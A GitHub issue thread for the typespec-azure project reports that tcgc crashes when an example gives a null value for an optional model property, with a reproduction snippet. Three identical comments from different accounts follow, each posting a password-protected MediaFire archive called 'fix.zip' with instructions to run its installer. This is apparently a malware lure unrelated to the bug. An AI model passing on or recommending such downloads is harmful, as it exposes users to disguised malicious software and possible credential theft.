### ISSUE TITLE
[Bug]: tcgc will crash when loading example with null value

### ISSUE THREAD

**Issue by tadelesh** [Azure/typespec-azure#1422]
### Describe the bug

if definition is an optional model property, but example value is `null`, tcgc will crash. the right behavior should be ignoring the value.

### Reproduction

definition:
```
  /**
   * Defines the Application Instance errors.
   */
  @visibility("read")
  errors?: SAPVirtualInstanceError;
```
example value:
```
"properties": {
          "dispatcherStatus": "Running",
          "errors": null,
          "gatewayPort": 3300,
          "health": "Healthy",
```

### Checklist

- [X] Follow our [Code of Conduct](https://github.com/azure/typespec-azure/blob/main/CODE_OF_CONDUCT.md)
- [X] Check that this issue is about the Azure libraries for typespec. For bug in the typespec language or core libraries file it in the [TypeSpec repo](https://github.com/Microsoft/TypeSpec/issues/new/choose)
- [X] Check that there isn't already an issue that request the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
